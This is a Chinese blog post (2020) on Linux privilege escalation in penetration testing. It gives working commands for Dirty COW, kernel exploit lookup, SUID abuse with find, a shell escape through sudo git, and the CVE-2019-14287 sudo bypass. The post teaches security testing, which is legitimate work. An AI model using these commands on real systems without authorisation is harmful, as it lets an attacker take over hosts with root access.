Linux提权

0x00 前言

渗透测试过程中,拿到低权限shell后,要进一步操作往往需要进行提权。

0x01 常见Linux提权方法

  • 内核版本漏洞提权
  • SUID提权
  • git提权
  • sudo提权(CVE-2019-14287)

0x02 Linux提权前的信息收集

1.查看内核版本

uname -a

2.查看发行版本

cat /etc/issue
cat /etc/*-release

0x03 内核漏洞提权

1.脏牛漏洞提权

低权限用户利用该漏洞技术可以在全版本上实现本地提权

漏洞利用条件:内核版本>=2.6.22

exp下载地址:https://github.com/FireFart/dirtycow

本地复现:

1.查看内核版本

2.将exp放到/tmp目录下(tmp目录权限较高)

 3.对dirty.c进行gcc编译生成一个可执行文件

gcc -pthread dirty.c -o dirty -lcryp

4.运行dirty文件即可进行本地提取

./dirty passwd

几分钟后出现如下结果

 

 此时切换到firefart用户,密码为passwd

可以看到已经是root用户

2.其他内核版本提权

在linux的内核版本不满足脏牛提权的条件时,就需要查看其他版本的内核漏洞。在搜集了目标机器的内核版本后,可以使用searchsploit搜寻各种发行版本的漏洞。

查询一个CentOS 7 内核版本为3.10的内核漏洞

searchspolit centos 7 kernel 3.10

随后需要打开exp查看具体要求,选择和合适的进行利用

最后将合适的exp放到靶机上编译后执行

内核漏洞提权对内核版本、目标机器的环境要求较高(需要安装gcc),所以成功率一般较低。

0x04 SUID提权

SUID(Set User ID):是一种特殊的文件属性,允许用户在指令执行时,拥有文件拥有者的权限

SUID提权:运行root用户拥有的SUID文件,即可获得root用户权限

常见的可用于SUID提权的文件有

find、bash、nmap、vim、more、less、nano、cp 

一般拿到shell后,首先查找下具有root权限的SUID文件

find / -perm -u=s -type f 2>/dev/null

1.find提权

先看看find的权限

确实是root权限

随后执行以下命令进行提权

touch test    //创建一个test文件
find test -exec '/bin/sh' \;

可以看到成功提升到root权限

0x05 git提权

首先查看可以无密码使用root权限的命令

sudo -l    #查看可以使用root权限无密码的命令

发现有git命令

执行命令进行提权

sudo git help config  #提权
!/bin/sh

成功切换到root权限

0x06 sudo提权(比较鸡肋)

sudo提权是一个sudo安全策略绕过问题,可导致恶意用户或程序在目标Linux系统上以root身份执行任意命令

使用sudo提权需要满足两个条件

1.执行sudo -V的到的版本<1.8.28

2.配置文件中需要有特定配置

配置文件/etc/sudoers中使用ALL关键词

test ALL=(ALL,!root) ALL    //表示test用户可以使用sudo命令,以除了root以外的任意身份去执行命令

切换到test用户下执行命令

sudo -u#-1 id

将用户ID转换为用户名的函数会将-1误认为0,正好是root用户的User ID

成功切换到root用户

 

posted @ 2020-08-04 10:18  Cl0wn  阅读(1808)  评论(0编辑  收藏  举报